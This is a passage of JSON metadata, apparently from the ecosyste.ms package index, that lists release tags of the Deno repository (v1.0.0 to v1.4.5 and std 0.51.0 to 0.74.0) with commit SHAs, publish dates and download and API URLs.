oland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/